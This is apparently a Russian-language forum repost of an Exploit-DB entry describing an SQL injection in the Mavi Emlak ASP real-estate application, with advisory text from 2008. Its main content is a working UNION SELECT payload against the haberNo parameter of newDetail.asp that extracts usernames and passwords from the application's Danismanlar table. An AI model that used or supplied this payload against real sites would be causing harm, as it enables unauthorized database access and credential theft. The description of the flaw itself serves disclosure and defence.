Exploit Mavi Emlak - 'newDetail.asp' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
32683
Проверка EDB
  1. Пройдено
Автор
SINA YAZDANMEHR
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
N/A
Дата публикации
2008-12-29
Код:
source: https://www.securityfocus.com/bid/33041/info

Mavi Emlak is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.

Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/newDetail.asp?haberNo=-9999%20union%20select%200,username,password,3,4,5%20from%20Danismanlar
 
Источник
www.exploit-db.com

Похожие темы